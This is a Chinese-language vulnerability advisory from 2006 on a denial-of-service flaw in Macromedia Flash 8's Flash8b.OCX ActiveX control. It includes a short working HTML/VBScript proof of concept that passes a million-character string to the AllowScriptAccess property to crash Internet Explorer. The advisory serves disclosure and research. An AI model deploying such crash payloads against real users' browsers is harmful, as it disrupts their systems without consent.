Macromedia Flash Flash8b.OCX ActiveX控件远程拒绝服务漏洞
发布日期:2006-12-30
更新日期:2007-01-08
受影响系统:Macromedia Flash 8
描述:
BUGTRAQ ID:
21818
Macromedia Flash Player是一款非常流行的FLASH播放器。
Flash的Flash8b.OCX ActiveX控件在处理畸形参数调用时存在漏洞,远程攻击者可能利用此漏洞导致用户浏览器崩溃。
如果用户通过IE或其他使用该控件的应用程序访问了恶意站点的话,就可能导致崩溃。
<*来源:shinnai (
shinnai@autistici.org)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<!--
--------------------------------------------------------------------------
Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site:
http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet
Explorer 7
---------------------------------------------------------------------------
-->
<html>
<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000'
id='Flash8b'></object>
<script language='vbscript'>
argCount = 1
arg1=String(1000000, "A")
Flash8b.AllowScriptAccess=arg1
</script>
建议:
厂商补丁:
Macromedia
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.macromedia.com/浏览次数:3079
严重程度:0(网友投票)
